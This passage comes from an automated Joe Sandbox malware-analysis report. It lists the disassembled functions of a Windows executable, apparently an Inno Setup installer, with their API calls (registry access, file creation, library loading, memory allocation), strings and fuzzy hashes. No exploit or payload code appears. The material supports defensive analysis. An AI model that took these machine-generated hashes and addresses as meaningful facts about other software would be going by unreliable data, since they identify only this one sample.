                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047741E,00000000,00477434,?,?,?,?,00000000), ref: 004771FA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID: RegisteredOrganization$RegisteredOwner
                                                                            • API String ID: 3535843008-1113070880
                                                                            • Opcode ID: 85432a3ed76ad868fb852c58816c2db2475bea01b49da00295727814efd58def
                                                                            • Instruction ID: 251e4fb5afb05e097686391082de11908fc67083b0d73a84a082d7502db0c793
                                                                            • Opcode Fuzzy Hash: 85432a3ed76ad868fb852c58816c2db2475bea01b49da00295727814efd58def
                                                                            • Instruction Fuzzy Hash: 26F0BB30708244AFDB11DBA59C52B9B375DD741304FA080BBF104DB382D6799D01C75C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00470A40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00470C77), ref: 00470A65
                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00470C77), ref: 00470A7C
                                                                              • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateErrorFileHandleLast
                                                                            • String ID: CreateFile
                                                                            • API String ID: 2528220319-823142352
                                                                            • Opcode ID: 7e28141043a3e0f576738c48cd57d39c8717062d9e0e2e81c58d16874d68a086
                                                                            • Instruction ID: f059ad179e7cc864c024b880cb83de53b773c1d1f6c265ff80624fd6f5be5d41
                                                                            • Opcode Fuzzy Hash: 7e28141043a3e0f576738c48cd57d39c8717062d9e0e2e81c58d16874d68a086
                                                                            • Instruction Fuzzy Hash: 86E06D74351304BBEA10E669CCC6F4A77889B18768F10C152FA59AF3E2C5B9EC40861C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00468898 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0042E1F0: SetErrorMode.KERNEL32(00008000), ref: 0042E1FA
                                                                              • Part of subcall function 0042E1F0: LoadLibraryA.KERNEL32(00000000,00000000,0042E244,?,00000000,0042E262,?,00008000), ref: 0042E229
                                                                            • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 004688AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressErrorLibraryLoadModeProc
                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                            • API String ID: 2492108670-2683653824
                                                                            • Opcode ID: 7d9e8a1c9394b5a8d7c81de7f260a8a70e759d715e8b294ff61618bd829d2d70
                                                                            • Instruction ID: 6cffaa682af11576deed02c6796eeeee027c815ce59d8c7ab8a1b116f7f65a8a
                                                                            • Opcode Fuzzy Hash: 7d9e8a1c9394b5a8d7c81de7f260a8a70e759d715e8b294ff61618bd829d2d70
                                                                            • Instruction Fuzzy Hash: 43B092F0A8071286DA0077B69842B1B2204D7D0708BE0897F7044BB289EE7C84054B9E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0047C208 Relevance: 4.6, APIs: 3, Instructions: 98windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemMenu.USER32(00000000,00000000,00000000,0047C340), ref: 0047C2D8
                                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0047C2E9
                                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 0047C301
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Append$System
                                                                            • String ID:
                                                                            • API String ID: 1489644407-0
                                                                            • Opcode ID: 15f49a51bc99aadf11e624829d5c93e52e60f789ff86a8cde7e3ee935291695d
                                                                            • Instruction ID: e529b759dd7a2e51a8c3bcc96a7d172377ee55af5fc7f1ed5a89e34a1d2f7138
                                                                            • Opcode Fuzzy Hash: 15f49a51bc99aadf11e624829d5c93e52e60f789ff86a8cde7e3ee935291695d
                                                                            • Instruction Fuzzy Hash: 0A31A170B047406AD711FBB59CC2BAA3AA49F51318F54857FB9049B3D3CA7C9809C79D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00450E94 Relevance: 4.6, APIs: 3, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • 74D31520.VERSION(00000000,?,?,?,004917BA), ref: 00450EB4
                                                                            • 74D31500.VERSION(00000000,?,00000000,?,00000000,00450F2F,?,00000000,?,?,?,004917BA), ref: 00450EE1
                                                                            • 74D31540.VERSION(?,00450F58,?,?,00000000,?,00000000,?,00000000,00450F2F,?,00000000,?,?,?,004917BA), ref: 00450EFB
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: D31500D31520D31540
                                                                            • String ID:
                                                                            • API String ID: 1003763464-0
                                                                            • Opcode ID: 7772eee873665419e592b8f0c908b8e340ebe2ab536abffed1c380b4fbd37808
                                                                            • Instruction ID: 38752d589292965b455f679da5e662606514df90b198f4031c48c0776fd97eb8
                                                                            • Opcode Fuzzy Hash: 7772eee873665419e592b8f0c908b8e340ebe2ab536abffed1c380b4fbd37808
                                                                            • Instruction Fuzzy Hash: 3F21A736A04208AFDB11DAA98C41DAFB7FCEB49315F554076FC04E3382D6799E04C769
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0044AC20 Relevance: 4.6, APIs: 3, Instructions: 74COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • 73A0A570.USER32(00000000,?,00000000,00000000,0044AD21,?,0047CB6F,?,?), ref: 0044AC95
                                                                            • SelectObject.GDI32(?,00000000), ref: 0044ACB8
                                                                            • 73A0A480.USER32(00000000,?,0044ACF8,00000000,0044ACF1,?,00000000,?,00000000,00000000,0044AD21,?,0047CB6F,?,?), ref: 0044ACEB
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: A480A570ObjectSelect
                                                                            • String ID:
                                                                            • API String ID: 1230475511-0
                                                                            • Opcode ID: 3e82d226e837a8f6b7b2e24a5f41b75efb5a851a96c6751f784262e8f2c57c71
                                                                            • Instruction ID: 433fe99046f9b8d1d8bc89e2463d1e9b45a303d4827d396566f55289c028a56b
                                                                            • Opcode Fuzzy Hash: 3e82d226e837a8f6b7b2e24a5f41b75efb5a851a96c6751f784262e8f2c57c71
                                                                            • Instruction Fuzzy Hash: 0B21A470E44248AFEB01DFA5C885B9EBBB9EB49304F41847AF500A7681D77C9950CB5A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0044A954 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044A9E0,?,0047CB6F,?,?), ref: 0044A9B2
                                                                            • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044A9C5
                                                                            • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044A9F9
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: DrawText$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 65125430-0
                                                                            • Opcode ID: c13eedb90b8a925426525e5fed0b4ef7f0e424fa92bc79367e1c17be0fc738c0
                                                                            • Instruction ID: 95435d2b4f75e5b2944811cec87d15154efa184d0a126f2c6d3e2a7360284236
                                                                            • Opcode Fuzzy Hash: c13eedb90b8a925426525e5fed0b4ef7f0e424fa92bc79367e1c17be0fc738c0
                                                                            • Instruction Fuzzy Hash: 101108B27406047FEB10DBAA8C82D6FB7ECDB49724F10413BF504E72D0C6389E418669
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042436C Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424382
                                                                            • TranslateMessage.USER32(?), ref: 004243FF
                                                                            • DispatchMessageA.USER32(?), ref: 00424409
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Message$DispatchPeekTranslate
                                                                            • String ID:
                                                                            • API String ID: 4217535847-0
                                                                            • Opcode ID: 4c72fe453077d3d5441811771d3c73f57da1beb0f02e586e781598996b195a0c
                                                                            • Instruction ID: aef1b0206ccdbb2aa8587e86ea6dacd49c82d9c27d6d10fa8c02d352bba97142
                                                                            • Opcode Fuzzy Hash: 4c72fe453077d3d5441811771d3c73f57da1beb0f02e586e781598996b195a0c
                                                                            • Instruction Fuzzy Hash: 6F11543030432056DA20E665A94179B73D4DFC1B44F80886EF9DD97382D77D9D4987AA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004165B4 Relevance: 4.5, APIs: 3, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetPropA.USER32(00000000,00000000), ref: 004165DA
                                                                            • SetPropA.USER32(00000000,00000000), ref: 004165EF
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 00416616
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Prop$Window
                                                                            • String ID:
                                                                            • API String ID: 3363284559-0
                                                                            • Opcode ID: 5c6b3d06cb009850df356c260b5fd7b3460cba3a8d418ad6d76e3dbffd8df0bd
                                                                            • Instruction ID: a4591c201cec785823d6f09090f19fa17713029ec43dd267bc08175e274880c9
                                                                            • Opcode Fuzzy Hash: 5c6b3d06cb009850df356c260b5fd7b3460cba3a8d418ad6d76e3dbffd8df0bd
                                                                            • Instruction Fuzzy Hash: 3EF0B271701210BBD710AB999C85FA632DCAB49715F160576BE09EF286C778DC41C7A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004014E4 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 37memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocFree
                                                                            • String ID: ,#v
                                                                            • API String ID: 2087232378-3386492414
                                                                            • Opcode ID: 1bcf32e1270a55b637581478727a2e9913153c6ccf7aad1aa7fae9fef5c4f448
                                                                            • Instruction ID: 19192df4380cdbc1205a3ed9b24420002ad268da67895c40ec756cea1f38d7a4
                                                                            • Opcode Fuzzy Hash: 1bcf32e1270a55b637581478727a2e9913153c6ccf7aad1aa7fae9fef5c4f448
                                                                            • Instruction Fuzzy Hash: 1EF0A772B0073067EB60596A4C81F5359C49FC5798F154076FD0DFF3E9D6B58C0142A9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041EDC4 Relevance: 4.5, APIs: 3, Instructions: 27windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 0041EDD4
                                                                            • IsWindowEnabled.USER32(?), ref: 0041EDDE
                                                                            • EnableWindow.USER32(?,00000000), ref: 0041EE04
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnableEnabledVisible
                                                                            • String ID:
                                                                            • API String ID: 3234591441-0
                                                                            • Opcode ID: 09ca1b9a0e147f9e3f9c02f0c1b7de6c858dacd1e672d107cae65fab239c05be
                                                                            • Instruction ID: 54ed9e8c30520215bbb9e32f791a183ef62373b3d5af12756bdb3ea3c07ca3da
                                                                            • Opcode Fuzzy Hash: 09ca1b9a0e147f9e3f9c02f0c1b7de6c858dacd1e672d107cae65fab239c05be
                                                                            • Instruction Fuzzy Hash: 8EE0E5B81003006AD710AF27DC85A57B69CBB55314F55843BAC0597693E63ED9408AB8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004062A0 Relevance: 4.5, APIs: 3, Instructions: 7COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GlobalHandle.KERNEL32 ref: 004062A1
                                                                            • GlobalUnWire.KERNEL32(00000000), ref: 004062A8
                                                                            • GlobalFree.KERNEL32(00000000), ref: 004062AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Global$FreeHandleWire
                                                                            • String ID:
                                                                            • API String ID: 318822183-0
                                                                            • Opcode ID: 811b5650058efd060b0480522622cea17f29fa46ba8acc2a698c355084a7e242
                                                                            • Instruction ID: 232b5a29dca1329e6ee8fbf729e049d74cb9239d0bdd557acda0a77be920d3a5
                                                                            • Opcode Fuzzy Hash: 811b5650058efd060b0480522622cea17f29fa46ba8acc2a698c355084a7e242
                                                                            • Instruction Fuzzy Hash: 73A001C4804A04A9D80072B2080BA2F244CD8413283D0496B7440B2183883C8C40593A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00408544 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,0040867A), ref: 00408563
                                                                              • Part of subcall function 00406D54: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406D71
                                                                              • Part of subcall function 004084D0: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,004944C0,00000001,?,0040859B,?,00000000,0040867A), ref: 004084EE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                            • String ID: D)I
                                                                            • API String ID: 1658689577-3281296081
                                                                            • Opcode ID: 9103b9db00703e184e34eb4656f7bfd6b4db387a392b2c8979318a7ca80b884a
                                                                            • Instruction ID: f58fcf4e1761da05b427c157ba45b790d79041d0860886b9734fa9e18fdbd457
                                                                            • Opcode Fuzzy Hash: 9103b9db00703e184e34eb4656f7bfd6b4db387a392b2c8979318a7ca80b884a
                                                                            • Instruction Fuzzy Hash: B4316575E00109ABCF01EF95C8819DEB779FF84318F158577E815BB245E738AE058B94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0047CB54 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetActiveWindow.USER32(?), ref: 0047CBF8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ActiveWindow
                                                                            • String ID: InitializeWizard
                                                                            • API String ID: 2558294473-2356795471
                                                                            • Opcode ID: 7279c2e58fd28a7885900cae1b936918ab34a155763bf2546a03f5746716a5ae
                                                                            • Instruction ID: 3ab1797be40594411df6c685a440b4787fcf783bea31960e6df624453c322c8c
                                                                            • Opcode Fuzzy Hash: 7279c2e58fd28a7885900cae1b936918ab34a155763bf2546a03f5746716a5ae
                                                                            • Instruction Fuzzy Hash: C011CE70208244AFD715EB6AFC92F4537A8E355328F2084BBF418CB3A1DB79A801CB0D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004770B4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,004772FA,00000000,00477434), ref: 004770F9
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 004770C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen
                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                            • API String ID: 47109696-1019749484
                                                                            • Opcode ID: 71c6e6b3dc286b70a3593d79c622b1ea36892c5bd16880d74348932d8ba95855
                                                                            • Instruction ID: 04cc745cd351e58eb0cff21a747400ae09bf373c4f85ab843473da0d03261e2e
                                                                            • Opcode Fuzzy Hash: 71c6e6b3dc286b70a3593d79c622b1ea36892c5bd16880d74348932d8ba95855
                                                                            • Instruction Fuzzy Hash: 7BF0A7317081246BDA00A65E9C42BAFA7DDCB84758FA0443BF508EB343D9BD9E0243AC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0046A878 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,?,004950AC,?,0046AB7B,?,00000000,0046B003,?,_is1), ref: 0046A89B
                                                                            Strings
                                                                            • Inno Setup: Setup Version, xrefs: 0046A899
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Value
                                                                            • String ID: Inno Setup: Setup Version
                                                                            • API String ID: 3702945584-4166306022
                                                                            • Opcode ID: 7c674279de04d575b201b80dd7d27308a15b9831806c0875c4ebb08a754ba4da
                                                                            • Instruction ID: 9f8d8e903d06484b85b597de6eb29e8b1ae332426fce2fadbe533b90cf17b58b
                                                                            • Opcode Fuzzy Hash: 7c674279de04d575b201b80dd7d27308a15b9831806c0875c4ebb08a754ba4da
                                                                            • Instruction Fuzzy Hash: 38E06D713016043FD710AA2A9C85F5BBADCDF98366F10403AB908EB392D978DD0186A9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0046A8E8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,004950AC,00000004,00000001,?,0046AF1B,?,?,00000000,0046B003,?,_is1,?), ref: 0046A8FB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Value
                                                                            • String ID: NoModify
                                                                            • API String ID: 3702945584-1699962838
                                                                            • Opcode ID: 7eb7c7e6cb67b214b7fefeacd9b811682ceea12d2a12e6196767648bea257352
                                                                            • Instruction ID: 3fa285531c513fb9f209240a3363212c8c226bbd47a131a1ec4299046806267d
                                                                            • Opcode Fuzzy Hash: 7eb7c7e6cb67b214b7fefeacd9b811682ceea12d2a12e6196767648bea257352
                                                                            • Instruction Fuzzy Hash: DAE04FB0640704BFEB04DB55CD4AF6B77ACDB48710F104059BA08EB291EA74FE00CA69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042DC54 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            Strings
                                                                            • System\CurrentControlSet\Control\Windows, xrefs: 0042DC6E
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
